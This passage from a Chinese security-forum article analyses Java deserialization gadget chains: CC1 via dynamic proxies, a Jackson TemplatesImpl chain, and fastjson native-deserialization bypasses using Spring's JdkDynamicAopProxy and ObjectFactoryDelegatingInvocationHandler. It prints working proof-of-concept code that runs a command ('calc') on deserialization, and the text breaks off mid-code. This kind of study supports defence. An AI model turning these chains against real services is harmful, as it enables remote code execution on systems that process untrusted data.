<style>html #layuicss-skinlayercss{display:none;position:absolute;width:1989px}@-webkit-keyframes bounceIn{0%{opacity:0;-webkit-transform:scale(.5);transform:scale(.5)}100%{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@keyframes bounceIn{0%{opacity:0;-webkit-transform:scale(.5);-ms-transform:scale(.5);transform:scale(.5)}100%{opacity:1;-webkit-transform:scale(1);-ms-transform:scale(1);transform:scale(1)}}@-webkit-keyframes zoomInDown{0%{opacity:0;-webkit-transform:scale(.1) translateY(-2000px);transform:scale(.1) translateY(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateY(60px);transform:scale(.475) translateY(60px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@keyframes zoomInDown{0%{opacity:0;-webkit-transform:scale(.1) translateY(-2000px);-ms-transform:scale(.1) translateY(-2000px);transform:scale(.1) translateY(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateY(60px);-ms-transform:scale(.475) translateY(60px);transform:scale(.475) translateY(60px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@-webkit-keyframes fadeInUpBig{0%{opacity:0;-webkit-transform:translateY(2000px);transform:translateY(2000px)}100%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@keyframes fadeInUpBig{0%{opacity:0;-webkit-transform:translateY(2000px);-ms-transform:translateY(2000px);transform:translateY(2000px)}100%{opacity:1;-webkit-transform:translateY(0);-ms-transform:translateY(0);transform:translateY(0)}}@-webkit-keyframes zoomInLeft{0%{opacity:0;-webkit-transform:scale(.1) translateX(-2000px);transform:scale(.1) translateX(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateX(48px);transform:scale(.475) translateX(48px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@keyframes zoomInLeft{0%{opacity:0;-webkit-transform:scale(.1) translateX(-2000px);-ms-transform:scale(.1) translateX(-2000px);transform:scale(.1) translateX(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateX(48px);-ms-transform:scale(.475) translateX(48px);transform:scale(.475) translateX(48px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@-webkit-keyframes rollIn{0%{opacity:0;-webkit-transform:translateX(-100%) rotate(-120deg);transform:translateX(-100%) rotate(-120deg)}100%{opacity:1;-webkit-transform:translateX(0) rotate(0);transform:translateX(0) rotate(0)}}@keyframes rollIn{0%{opacity:0;-webkit-transform:translateX(-100%) rotate(-120deg);-ms-transform:translateX(-100%) rotate(-120deg);transform:translateX(-100%) rotate(-120deg)}100%{opacity:1;-webkit-transform:translateX(0) rotate(0);-ms-transform:translateX(0) rotate(0);transform:translateX(0) rotate(0)}}@keyframes fadeIn{0%{opacity:0}100%{opacity:1}}@-webkit-keyframes shake{0%,100%{-webkit-transform:translateX(0);transform:translateX(0)}10%,30%,50%,70%,90%{-webkit-transform:translateX(-10px);transform:translateX(-10px)}20%,40%,60%,80%{-webkit-transform:translateX(10px);transform:translateX(10px)}}@keyframes shake{0%,100%{-webkit-transform:translateX(0);-ms-transform:translateX(0);transform:translateX(0)}10%,30%,50%,70%,90%{-webkit-transform:translateX(-10px);-ms-transform:translateX(-10px);transform:translateX(-10px)}20%,40%,60%,80%{-webkit-transform:translateX(10px);-ms-transform:translateX(10px);transform:translateX(10px)}}@-webkit-keyframes fadeIn{0%{opacity:0}100%{opacity:1}}@-webkit-keyframes bounceOut{100%{opacity:0;-webkit-transform:scale(.7);transform:scale(.7)}30%{-webkit-transform:scale(1.05);transform:scale(1.05)}0%{-webkit-transform:scale(1);transform:scale(1)}}@keyframes bounceOut{100%{opacity:0;-webkit-transform:scale(.7);-ms-transform:scale(.7);transform:scale(.
<body>
<div class="global-nav mb-50">
<nav class="navbar navbar-inverse navbar-fixed-top">
<div class="container nav">
<div class="visible-xs header-response sf-hidden">
</div>
<div class="row hidden-xs">
<div class="col-sm-9 col-md-9 col-lg-9">
<div class=navbar-header>
<button type=button class="navbar-toggle collapsed sf-hidden" data-toggle=collapse data-target=#global-navbar>
</button>
<div class=logo><a class="navbar-brand logo" href=https://forum.butian.net/></a></div>
</div>
<div class="collapse navbar-collapse" id=global-navbar>
<ul class="nav navbar-nav">
<li><a href=https://forum.butian.net/>首页 <span class=sr-only>(current)</span></a></li>
<li><a href=https://forum.butian.net/questions>问答</a></li>
<li><a href=https://forum.butian.net/shop>商城</a></li>
<li><a href=https://forum.butian.net/community>实战攻防技术</a></li>
<li><a href=https://forum.butian.net/articles>漏洞分析与复现</a>
<span class=hot>NEW</span>
</li>
<li><a href=https://forum.butian.net/movable>活动</a></li>
<li><a href=https://forum.butian.net/questions/Play>摸鱼办</a>
</li>
</ul>
<form role=search id=top-search-form action=https://forum.butian.net/search method=GET class="navbar-form hidden-sm hidden-xs pull-right">
<span class="btn btn-link"><span class=sr-only>搜索</span><span class="glyphicon glyphicon-search"></span></span>
<input type=text name=word id=searchBox class=form-control placeholder value>
</form>
</div>
</div>
</div>
</div>
</nav>
</div>
<div class="top-alert mt-60 clearfix text-center">
<!--[if lt IE 9]>
<div class="alert alert-danger topframe" role="alert">你的浏览器实在<strong>太太太太太太旧了</strong>,放学别走,升级完浏览器再说
<a target="_blank" class="alert-link" href="http://browsehappy.com">立即升级</a>
</div>
<![endif]-->
</div>
<div class=wrap>
<div class=container>
<div class="row mt-10">
<div class="col-xs-12 col-md-9 main" style=width:100%>
<div class=widget-article>
<h3 class="title word-wrap">fastjson 原生反序列化配合动态代理绕过限制</h3>
<ul class=taglist-inline>
</ul>
<div class="content mt-10">
<div class="quote mb-20">
对于动态代理,只记得 cc1 接触过一次,然后就没有怎么碰到过了,而且动态代理似乎利用面还是比较广的,许多关键时刻都会使用到,这里正好来重新学习学习,还记得入门 java 的时候动态代理就学了半天,感觉确实很抽象
</div>
<textarea id=md_view_content style=display:none>fastjson 原生反序列化配合动态代理绕过限制
=========================
前言
--
对于动态代理,只记得 cc1 接触过一次,然后就没有怎么碰到过了,而且动态代理似乎利用面还是比较广的,许多关键时刻都会使用到,这里正好来重新学习学习,还记得入门 java 的时候动态代理就学了半天,感觉确实很抽象
cc1 动态代理初识
----------
首先是我们的调用链
```php
AnnotationInvocationHan.readobject--proxy.entryset--AnnotationInvocationHan.invoke--LazyMap.get--chainedTransformer.transformer....
```
**POC**
```php
package cc1;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Proxy;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.HashMap;
import java.util.Map;
public class CC1lazy {
public static void main(String[] args) throws IOException, NoSuchMethodException, InvocationTargetException, IllegalAccessException, ClassNotFoundException, InstantiationException {
//定义一系列Transformer对象,组成一个变换链
Transformer[] transformers = new Transformer[]{
//返回Runtime.class
new ConstantTransformer(Runtime.class),
//通过反射调用getRuntime()方法获取Runtime对象
new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime",null}),
//通过反射调用invoke()方法
new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
//通过反射调用exec()方法启动notepad
new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
};
//将多个Transformer对象组合成一个链
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
HashMap hash = new HashMap&amp;lt;&amp;gt;();
//使用chainedTransformer装饰HashMap生成新的Map
Map decorate = LazyMap.decorate(hash, chainedTransformer);
//通过反射获取AnnotationInvocationHandler类的构造方法
Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
Constructor constructor = c.getDeclaredConstructor(Class.class, Map.class);
//设置构造方法为可访问的
constructor.setAccessible(true);
//通过反射创建 Override 类的代理对象 instance,并设置其调用会委托给 decorate 对象
InvocationHandler instance = (InvocationHandler) constructor.newInstance(Override.class, decorate);
//因为AnnotationInvocationHandler是继承了代理接口的所以可以直接使用它的构造器去构造一个代理的处理器但是需要强转
//创建Map接口的代理对象proxyInstance,并设置其调用处理器为instance
Map proxyInstance = (Map) Proxy.newProxyInstance(Map.class.getClassLoader(), new Class[]{Map.class}, instance);
//再次通过反射创建代理对象
Object o = constructor.newInstance(Override.class, proxyInstance);
serialize(o);
unserialize("1.bin");
}
public static void serialize(Object obj) throws IOException {
ObjectOutputStream out = new ObjectOutputStream(Files.newOutputStream(Paths.get("1.bin")));
out.writeObject(obj);
}
public static void unserialize(String filename) throws IOException, ClassNotFoundException {
ObjectInputStream out = new ObjectInputStream(Files.newInputStream(Paths.get(filename)));
out.readObject();
}
}
```
这里我们只对动态代理的部分做分析
这里本来的目的是寻找一个能够嫁接调用 get 的地方
找到了 AnnotationInvocationHandler 的 invoke 方法
```php
public Object invoke(Object var1, Method var2, Object[] var3) {
String var4 = var2.getName();
Class[] var5 = var2.getParameterTypes();
if (var4.equals("equals") &amp;amp;&amp;amp; var5.length == 1 &amp;amp;&amp;amp; var5[0] == Object.class) {
return this.equalsImpl(var3[0]);
} else if (var5.length != 0) {
throw new AssertionError("Too many parameters for an annotation method");
} else {
switch (var4) {
case "toString":
return this.toStringImpl();
case "hashCode":
return this.hashCodeImpl();
case "annotationType":
return this.type;
default:
Object var6 = this.memberValues.get(var4);
if (var6 == null) {
throw new IncompleteAnnotationException(this.type, var4);
} else if (var6 instanceof ExceptionProxy) {
throw ((ExceptionProxy)var6).generateException();
} else {
if (var6.getClass().isArray() &amp;amp;&amp;amp; Array.getLength(var6) != 0) {
var6 = this.cloneArray(var6);
}
return var6;
}
}
}
}
```
只需要它的 memberValues 可以控制就 ok
所以就回到了如何触发 invoke 的问题上来了
![](https://shs3.b.qianxin.com/attack_forum/2025/02/attach-3a2346294dfa6dad08c222c02bd3de66bca01cde.png)
可以看到他 implements 了InvocationHandler 这个接口,说明这个类也可以动态代理
因为实现了这个接口必须重写一个 invoke 方法,而且方法会在代理对象的方法被调用时执行,所以我们如果创建一个动态代理,而且把它作为代理的处理器,那么就可以成功的触发 invoke 方法
我们知道因为动态代理的缘故,只要有代理对象的方法被触发,他也会触发。
具体的 cc1 的细节我们就不看了,关键就是如何出的 invoke 方法
接下来是怎么创建一个代理,来把这个类作为代理对象?我们只要使用 Proxy 创建一个代理实例,将我们构造的 AnnotationInvocationHandler 对象作为调用处理器传入。代理什么?
由于 AnnotationInvocationHandler.readObject() 是反序列化的入口,我们需要通过 AnnotationInvocationHandler 来包装由 Proxy 创建的代理对象,并将其重新序列化。
在反序列化时memberValues 的 entrySet() 方法会被调用,而我们希望 memberValues 内部存储的代理对象能够触发 invoke() 方法,从而进入我们构造的链条。
因为 memberValues 是一个 Map 类型,所以我们需要通过 Proxy 创建一个 Map 类型的代理对象。
简单的调试看看调用栈
```php
invoke:57, AnnotationInvocationHandler (sun.reflect.annotation)
entrySet:-1, $Proxy1 (com.sun.proxy)
readObject:444, AnnotationInvocationHandler (sun.reflect.annotation)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:62, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:497, Method (java.lang.reflect)
invokeReadObject:1058, ObjectStreamClass (java.io)
readSerialData:1900, ObjectInputStream (java.io)
readOrdinaryObject:1801, ObjectInputStream (java.io)
readObject0:1351, ObjectInputStream (java.io)
readObject:371, ObjectInputStream (java.io)
unserialize:67, CC1lazy (cc1)
main:57, CC1lazy (cc1)
```
这里因为调用了 public abstract java.util.Set java.util.Map.entrySet()触发了动态代理
调用代理的 invoke 方法,从而接起了后面的链子
JdkDynamicAopProxy 代理绕过
-----------------------
当然上面的代理虽然是我们链子中的常客,但是限制还是很大的,因为在高版本的 jdk 改了
这里我们看看这个动态代理类
首先如何寻找这种代理呢
其实很简单,只需要实现我们的接口,我们找接口的实现类
![](https://shs3.b.qianxin.com/attack_forum/2025/02/attach-d7f3a422275e0ecde616eaee2af9bf8067d9b84f.png)
但是限制就是需要我们存在依赖
网上找了一下,发现以前见过,网上公开的利用就是在 jackson 原生反序列化的时候
参考https://xz.aliyun.com/t/12846?time\_\_1311=GqGxuDcDRGexlxx2DU27oDkmD8SGCmzmeD
是为了解决 jackson 原生不稳定的痛点
正常的调用链
```php
package org.jackson;
import com.fasterxml.jackson.databind.node.POJONode;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.CtConstructor;
import javax.management.BadAttributeValueExpException;
import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.util.Base64;
public class EXP {
public static void main(String[] args) throws Exception {
ClassPool pool = ClassPool.getDefault();
CtClass ctClass = pool.makeClass("a");
CtClass superClass = pool.get(AbstractTranslet.class.getName());
ctClass.setSuperclass(superClass);
CtConstructor constructor = new CtConstructor(new CtClass[]{},ctClass);
constructor.setBody("Runtime.getRuntime().exec(\"calc\");");
ctClass.addConstructor(constructor);
byte[] bytes = ctClass.toBytecode();
Templates templatesImpl = new TemplatesImpl();
setFieldValue(templatesImpl, "_bytecodes", new byte[][]{bytes});
setFieldValue(templatesImpl, "_name", "xxx");
setFieldValue(templatesImpl, "_tfactory", null);
POJONode jsonNodes = new POJONode(templatesImpl);
BadAttributeValueExpException exp = new BadAttributeValueExpException(null);
Field val = Class.forName("javax.management.BadAttributeValueExpException").getDeclaredField("val");
val.setAccessible(true);
val.set(exp,jsonNodes);
ByteArrayOutputStream barr = new ByteArrayOutputStream();
ObjectOutputStream objectOutputStream = new ObjectOutputStream(barr);
objectOutputStream.writeObject(exp);
FileOutputStream fout=new FileOutputStream("1.ser");
fout.write(barr.toByteArray());
fout.close();
FileInputStream fileInputStream = new FileInputStream("1.ser");
System.out.println(serial(exp));
deserial(serial(exp));
}
public static String serial(Object o) throws IOException, NoSuchFieldException {
ByteArrayOutputStream baos = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(baos);
oos.writeObject(o);
oos.close();
String base64String = Base64.getEncoder().encodeToString(baos.toByteArray());
return base64String;
}
public static void deserial(String data) throws Exception {
byte[] base64decodedBytes = Base64.getDecoder().decode(data);
ByteArrayInputStream bais = new ByteArrayInputStream(base64decodedBytes);
ObjectInputStream ois = new ObjectInputStream(bais);
ois.readObject();
ois.close();
}
private static void setFieldValue(Object obj, String field, Object arg) throws Exception{
Field f = obj.getClass().getDeclaredField(field);
f.setAccessible(true);
f.set(obj, arg);
}
}
```
但是会爆错
```php
Caused by: java.lang.NullPointerException
at com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.getStylesheetDOM(TemplatesImpl.java:450)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
```
爆指针的问题
是因为
在调用 getter 方法的时候,是根据 props 的顺序来决定的
```php
protected void serializeFields(Object bean, JsonGenerator gen, SerializerProvider provider)
throws IOException
{
final BeanPropertyWriter[] props;
if (_filteredProps != null &amp;amp;&amp;amp; provider.getActiveView() != null) {
props = _filteredProps;
} else {
props = _props;
}
int i = 0;
try {
for (final int len = props.length; i &amp;lt; len; ++i) {
BeanPropertyWriter prop = props[i];
if (prop != null) { // can have nulls in filtered list
prop.serializeAsField(bean, gen, provider);
}
}
if (_anyGetterWriter != null) {
_anyGetterWriter.getAndSerialize(bean, gen, provider);
}
} catch (Exception e) {
String name = (i == props.length) ? "[anySetter]" : props[i].getName();
wrapAndThrow(provider, e, bean, name);
} catch (StackOverflowError e) {
...
}
}
```
顺序不固定
```php
transletindex
stylesheetDOM
outputProperties
```
当 `stylesheetDOM` 在 `outputProperties` 之前,所以 `getStylesheetDOM` 会先于 `getOutputProperties` 触发。当 `getStylesheetDOM` 方法先被触发时,由于 `_sdom` 成员为空,会导致空指针报错,反序列化攻击失败。
所以我们利用 JdkDynamicAopProxy 类来代理就是为了解决不稳定痛点
我们看到它的 invoke 方法
```php
public Object invoke(Object proxy, Method method, Object[] args) throws Throwable {
Object oldProxy = null;
boolean setProxyContext = false;
TargetSource targetSource = this.advised.targetSource;
Object target = null;
Object retVal;
try {
if (!this.equalsDefined &amp;amp;&amp;amp; AopUtils.isEqualsMethod(method)) {
Boolean var18 = this.equals(args[0]);
return var18;
}
if (!this.hashCodeDefined &amp;amp;&amp;amp; AopUtils.isHashCodeMethod(method)) {
Integer var17 = this.hashCode();
return var17;
}
if (method.getDeclaringClass() == DecoratingProxy.class) {
Class var16 = AopProxyUtils.ultimateTargetClass(this.advised);
return var16;
}
if (this.advised.opaque || !method.getDeclaringClass().isInterface() || !method.getDeclaringClass().isAssignableFrom(Advised.class)) {
if (this.advised.exposeProxy) {
oldProxy = AopContext.setCurrentProxy(proxy);
setProxyContext = true;
}
target = targetSource.getTarget();
Class&amp;lt;?&amp;gt; targetClass = target != null ? target.getClass() : null;
List chain = this.advised.getInterceptorsAndDynamicInterceptionAdvice(method, targetClass);
if (chain.isEmpty()) {
Object[] argsToUse = AopProxyUtils.adaptArgumentsIfNecessary(method, args);
retVal = AopUtils.invokeJoinpointUsingReflection(target, method, argsToUse);
} else {
MethodInvocation invocation = new ReflectiveMethodInvocation(proxy, target, method, args, targetClass, chain);
retVal = invocation.proceed();
}
Class&amp;lt;?&amp;gt; returnType = method.getReturnType();
if (retVal != null &amp;amp;&amp;amp; retVal == target &amp;amp;&amp;amp; returnType != Object.class &amp;amp;&amp;amp; returnType.isInstance(proxy) &amp;amp;&amp;amp; !RawTargetAccess.class.isAssignableFrom(method.getDeclaringClass())) {
retVal = proxy;
} else if (retVal == null &amp;amp;&amp;amp; returnType != Void.TYPE &amp;amp;&amp;amp; returnType.isPrimitive()) {
throw new AopInvocationException("Null return value from advice does not match primitive return type for: " + method);
}
Object var12 = retVal;
return var12;
}
retVal = AopUtils.invokeJoinpointUsingReflection(this.advised, method, args);
} finally {
if (target != null &amp;amp;&amp;amp; !targetSource.isStatic()) {
targetSource.releaseTarget(target);
}
if (setProxyContext) {
AopContext.setCurrentProxy(oldProxy);
}
}
return retVal;
}
```
最后会返回一个 retVal 对象,而这个对象是
```php
AopUtils.invokeJoinpointUsingReflection(this.advised, method, args)
```
得来的,跟进 invokeJoinpointUsingReflection 方法
![image-20240620150501324](https://shs3.b.qianxin.com/attack_forum/2025/02/attach-67e6f48890ff83cbed3d6062a5ae266fed8e5aa3.png)
可以看到可以反射调用方法
而 `advised` 成员是一个 `org.springframework.aop.framework.AdvisedSupport` 类型的对象,它的 `targetSource` 成员中保存了 `JdkDynamicAopProxy` 类代理的接口的实现类。
思路就是
```php
1. 构造一个 `JdkDynamicAopProxy` 类型的对象,将 `TemplatesImpl` 类型的对象设置为 `targetSource`
2. 使用这个 `JdkDynamicAopProxy` 类型的对象构造一个代理类,代理 `javax.xml.transform.Templates` 接口
3. JSON 序列化库只能从这个 `JdkDynamicAopProxy` 类型的对象上找到 `getOutputProperties` 方法
4. 通过代理类的 `invoke` 机制,触发 `TemplatesImpl#getOutputProperties` 方法,实现恶意类加载
```
我们举一反三,使用在 fastjson 的原生反序列化中
替代 TemplatesImpl 并不容易,主要是因为要么所需的依赖库较为冷门,或者对版本的要求较为严格,要么是替代品的使用方式并不直观或不够灵活。
因此,换一种思路,我尝试在 JsonArray 和 TemplatesImpl 之间引入一个“中间层”,作为一个连接桥梁,这样既避免了直接替换 TemplatesImpl 的复杂性,又能够实现所需的功能
这里我们调试一下文章给出的代码
```php
public class Fastjson4_JdkDynamicAopProxy {
public Object getObject (String cmd) throws Exception {
Object node1 = TemplatesImplNode.makeGadget(cmd);
Object node2 = JdkDynamicAopProxyNode.makeGadget(node1);
Proxy proxy = (Proxy) Proxy.newProxyInstance(Proxy.class.getClassLoader(),
new Class[]{Templates.class}, (InvocationHandler)node2);
Object node3 = JsonArrayNode.makeGadget(2,proxy);
Object node4 = BadAttrValExeNode.makeGadget(node3);
Object[] array = new Object[]{node1,node4};
Object node5 = HashMapNode.makeGadget(array);
return node5;
}
public static void main(String[] args) throws Exception {
Object object = new Fastjson4_JdkDynamicAopProxy().getObject(Util.getDefaultTestCmd());
Util.runGadgets(object);
}
}
```
可以很直观的看到是代理了 Templates 接口
在代理类的构造中
```php
public class JdkDynamicAopProxyNode {
public static Object makeGadget(Object gadget) throws Exception {
AdvisedSupport as = new AdvisedSupport();
as.setTargetSource(new SingletonTargetSource(gadget));
return Reflections.newInstance("org.springframework.aop.framework.JdkDynamicAopProxy",AdvisedSupport.class,as);
}
}
```
我们构造的恶意 TemplatesImpl 作为 TargetSource
![](https://shs3.b.qianxin.com/attack_forum/2025/02/attach-9c8f7d309df5ed43608f409942013f615f53d1e0.png)
因为代理的是 Templates
![](https://shs3.b.qianxin.com/attack_forum/2025/02/attach-b11688f47625badf834ced00093980fbd438816d.png)
可以看到是只有一个 getter 方法,所以调用栈如下
```php
invoke:160, JdkDynamicAopProxy (org.springframework.aop.framework)
getOutputProperties:-1, $Proxy1 (com.sun.proxy)
write:-1, OWG_1_1_$Proxy1 (com.alibaba.fastjson2.writer)
write:3124, JSONWriterUTF16 (com.alibaba.fastjson2)
toString:914, JSONArray (com.alibaba.fastjson2)
readObject:86, BadAttributeValueExpException (javax.management)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:62, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:497, Method (java.lang.reflect)
invokeReadObject:1058, ObjectStreamClass (java.io)
readSerialData:1900, ObjectInputStream (java.io)
readOrdinaryObject:1801, ObjectInputStream (java.io)
readObject0:1351, ObjectInputStream (java.io)
readObject:371, ObjectInputStream (java.io)
readObject:1396, HashMap (java.util)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:62, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:497, Method (java.lang.reflect)
invokeReadObject:1058, ObjectStreamClass (java.io)
readSerialData:1900, ObjectInputStream (java.io)
readOrdinaryObject:1801, ObjectInputStream (java.io)
readObject0:1351, ObjectInputStream (java.io)
readObject:371, ObjectInputStream (java.io)
deserialize:53, Util (common)
runGadgets:38, Util (common)
main:24, Fastjson4_JdkDynamicAopProxy
```
只会调用getOutputProperties 方法,触发我们的 invoke
![](https://shs3.b.qianxin.com/attack_forum/2025/02/attach-0b2823e66e3757ab202e01e3bbb1291e1c26c853.png)
然后调用到我们 `TemplatesImpl#getOutputProperties` 方法成功实现中间过渡
![](https://shs3.b.qianxin.com/attack_forum/2025/02/attach-4468c557105a61e7c8baffe1cf0b02fdc8e69f78.png)
ObjectFactoryDelegatingInvocationHandler 绕过
-------------------------------------------
还是一样方法
![](https://shs3.b.qianxin.com/attack_forum/2025/02/attach-bed5418f252e7122640d18a752c402f9809e0ab5.png)
首先主体逻辑还是和上面一样的,核心还是代理 Templates 接口
我们看到 invoke 方法
```php
public Object invoke(Object proxy, Method method, Object[] args) throws Throwable {
switch (method.getName()) {
case "equals":
return proxy == args[0];
case "hashCode":
return System.identityHashCode(proxy);
case "toString":
return this.objectFactory.toString();
default:
try {
return method.invoke(this.objectFactory.getObject(), args);
} catch (InvocationTargetException var6) {
throw var6.getTargetException();
}
}
}
```
可以看到逻辑,还是一样的,不过区别在于我们的对象是 this.objectFactory.getObject()获取的了
目的就是需要它返回我们的 teamplatesImpl 对象
首先我们寻找继承了 ObjectFactory 的类
![](https://shs3.b.qianxin.com/attack_forum/2025/02/attach-d838e1c809c0a91046b4280aa398049a0c94a0d4.png)
也不太多
找了一下确实没有能够利用的
这里师傅的想法是
用 JSONObject 代理 ObjectFactoryDelegatingInvocationHandler 中的 objectFactory 属性,返回 teamplatesImpl
说真的,简直很妙
我们看到 invoke 方法
![](https://shs3.b.qianxin.com/attack_forum/2025/02/attach-fda9853749d2588e61fd356ece5722216f1fe1e1.png)
没想到它也是一个代理类
调试分析一下
```php
invoke:292, AutowireUtils$ObjectFactoryDelegatingInvocationHandler (org.springframework.beans.factory.support)
getOutputProperties:-1, $Proxy2 (com.sun.proxy)
write:-1, OWG_1_1_$Proxy2 (com.alibaba.fastjson2.writer)
write:3124, JSONWriterUTF16 (com.alibaba.fastjson2)
toString:914, JSONArray (com.alibaba.fastjson2)
readObject:86, BadAttributeValueExpException (javax.management)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:62, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:497, Method (java.lang.reflect)
invokeReadObject:1058, ObjectStreamClass (java.io)
readSerialData:1900, ObjectInputStream (java.io)
readOrdinaryObject:1801, ObjectInputStream (java.io)
readObject0:1351, ObjectInputStream (java.io)
readObject:371, ObjectInputStream (java.io)
readObject:1396, HashMap (java.util)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:62, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:497, Method (java.lang.reflect)
invokeReadObject:1058, ObjectStreamClass (java.io)
readSerialData:1900, ObjectInputStream (java.io)
readOrdinaryObject:1801, ObjectInputStream (java.io)
readObject0:1351, ObjectInputStream (java.io)
readObject:371, ObjectInputStream (java.io)
deserialize:53, Util (common)
runGadgets:38, Util (common)
main:33, Fastjson4_ObjectFactoryDelegatingInvocationHandler
```
![](https://shs3.b.qianxin.com/attack_forum/2025/02/attach-e89394e3c48dea31e8a1806caed54ba05e18dd4a.png)
然后调用 JSONObject 的 invoke 方法
```php
public Object invoke(Object proxy, Method method, Object[] args) throws Throwable {
String methodName = method.getName();
int parameterCount = method.getParameterCount();
Class&amp;lt;?&amp;gt; returnType = method.getReturnType();
if (parameterCount == 1) {
if ("equals".equals(methodName)) {
return this.equals(args[0]);
} else {
Class proxyInterface = null;
Class&amp;lt;?&amp;gt;[] interfaces = proxy.getClass().getInterfaces();
if (interfaces.length == 1) {
proxyInterface = interfaces[0];
}
if (returnType != Void.TYPE &amp;amp;&amp;amp; returnType != proxyInterface) {
throw new JSONException("This method '" + methodName + "' is not a setter");
} else {
String name = this.getJSONFieldName(method);
if (name == null) {
if (!methodName.startsWith("set")) {
throw new JSONException("This method '" + methodName + "' is not a setter");
}
name = methodName.substring(3);
if (name.length() == 0) {
throw new JSONException("This method '" + methodName + "' is an illegal setter");
}
name = Character.toLowerCase(name.charAt(0)) + name.substring(1);
}
this.put(name, args[0]);
return returnType != Void.TYPE ? proxy : null;
}
}
} else if (parameterCount == 0) {
if (returnType == Void.TYPE) {
throw new JSONException("This method '" + methodName + "' is not a getter");
} else {
String name = this.getJSONFieldName(method);
Object value;
if (name == null) {
boolean with = false;
int prefix;
if ((methodName.startsWith("get") || (with = methodName.startsWith("with"))) &amp;amp;&amp;amp; methodName.length() &amp;gt; (prefix = with ? 4 : 3)) {
char[] chars = new char[methodName.length() - prefix];
methodName.getChars(prefix, methodName.length(), chars, 0);
if (chars[0] &amp;gt;= 'A' &amp;amp;&amp;amp; chars[0] &amp;lt;= 'Z') {
chars[0] = (char)(chars[0] + 32);
}
String fieldName = new String(chars);
if (fieldName.isEmpty()) {
throw new JSONException("This method '" + methodName + "' is an illegal getter");
}
value = this.get(fieldName);
if (value == null) {
return null;
}
} else {
if (!methodName.startsWith("is")) {
if ("hashCode".equals(methodName)) {
return this.hashCode();
}
if ("toString".equals(methodName)) {
return this.toString();
}
if (methodName.startsWith("entrySet")) {
return this.entrySet();
}
if ("size".equals(methodName)) {
return this.size();
}
Class&amp;lt;?&amp;gt; declaringClass = method.getDeclaringClass();
if (declaringClass.isInterface() &amp;amp;&amp;amp; !Modifier.isAbstract(method.getModifiers()) &amp;amp;&amp;amp; !JDKUtils.ANDROID &amp;amp;&amp;amp; !JDKUtils.GRAAL) {
MethodHandles.Lookup lookup = JDKUtils.trustedLookup(declaringClass);
MethodHandle methodHandle = lookup.findSpecial(declaringClass, method.getName(), MethodType.methodType(returnType), declaringClass);
return methodHandle.invoke(proxy);
}
throw new JSONException("This method '" + methodName + "' is not a getter");
}
if ("isEmpty".equals(methodName)) {
value = this.get("empty");
if (value == null) {
return this.isEmpty();
}
} else {
name = methodName.substring(2);
if (name.isEmpty()) {
throw new JSONException("This method '" + methodName + "' is an illegal getter");
}
name = Character.toLowerCase(name.charAt(0)) + name.substring(1);
value = this.get(name);
if (value == null) {
return false;
}
}
}
} else {
value = this.get(name);
if (value == null) {
return null;
}
}
if (!returnType.isInstance(value)) {
Function typeConvert = JSONFactory.getDefaultObjectReaderProvider().getTypeConvert(value.getClass(), method.getGenericReturnType());
if (typeConvert != null) {
value = typeConvert.apply(value);
}
}
return value;
}
} else {
throw new UnsupportedOperationException(method.toGenericString());
}
}
```
最后返回的是 value我们主要关心 value
因为我们调用的方法是 getObejct\\
会进入如下的 if
```php
if ((methodName.startsWith("get") || (with = methodName.startsWith("with"))) &amp;amp;&amp;amp; methodName.length() &amp;gt; (prefix = with ? 4 : 3)) {
char[] chars = new char[methodName.length() - prefix];
methodName.getChars(prefix, methodName.length(), chars, 0);
if (chars[0] &amp;gt;= 'A' &amp;amp;&amp;amp; chars[0] &amp;lt;= 'Z') {
